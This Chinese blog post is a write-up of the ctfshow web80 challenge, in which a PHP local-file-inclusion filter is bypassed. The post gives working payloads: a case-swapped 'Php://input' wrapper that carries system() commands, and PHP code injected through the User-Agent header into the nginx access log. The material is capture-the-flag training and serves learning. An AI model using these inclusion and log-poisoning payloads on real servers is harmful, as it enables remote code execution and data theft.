当前位置: 首页 > news >正文

[ctfshow web入门] web80

news 来源:原创 2025/6/1 11:07:42

信息收集

过滤了phpdata

if(isset($_GET['file'])){$file = $_GET['file'];$file = str_replace("php", "???", $file);$file = str_replace("data", "???", $file);include($file);
}else{highlight_file(__FILE__);
}

解题

大小写绕过

data不知道为什么不成功,有知道的大佬也可以在评论区教我一手

?file=Php://input
post:
<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

hackbar记得使用raw模式,basic模式下服务器无法收到任何post数据

在这里插入图片描述

日志绕过

?file=/var/log/nginx/access.log

user-agent里写上

<?php system('ls'); ?>
<?php system('tac fl0g.php'); ?>

在这里插入图片描述

web79    目录    web81

相关文章:

  • NodeMediaEdge通道管理
  • 【二维数组】
  • 基于Java(SSH框架)+MySQL 实现(Web)公司通用门户(CMS)网站
  • 栈与队列:数据结构的有序律动
  • 二、OpenCV图像处理-图像处理
  • mysql的Memory引擎的深入了解
  • 电子电路:D触发器的工作原理及应用详解
  • 换宽带ip地址会变吗?同一个宽带如何切换ip地址
  • audit日志轮训保留180天的日志,按天保存
  • 每个路由器接口,都必须分配所属网络内的 IP 地址,用于转发数据包
  • 实验设计与分析(第6版,Montgomery)第5章析因设计引导5.7节思考题5.13 R语言解题
  • openppp2 -- 1.0.0.25225 优化多线接入运营商路由调配
  • AI Agent开发入门笔记(1)
  • 面试大厂Java:从Spring Boot到微服务架构
  • Asp.Net Core FluentValidation校验框架
  • 判断它是否引用了外部库
  • Linux Kernel动态调试:运行时调试的利器
  • 【自然语言处理】——基于与训练模型的方法【复习篇1】
  • Visual Studio 2022 发布独立的 exe 文件
  • 【android bluetooth 案例分析 04】【Carplay 详解 1】【CarPlay 在车机侧的蓝牙通信原理与角色划分详解】
  • 那些网站专门做游戏辅助的/买外链有用吗
  • 做高仿包的网站有哪些/关键词优化排名软件怎么样
  • 陕西网站制作公司哪家好/搜索引擎市场份额2023
  • 网站建设ningqueseo/东莞seo托管
  • 网站推广建设加盟/网络营销与管理
  • java学完后可以做网站吗/全球网站访问量排名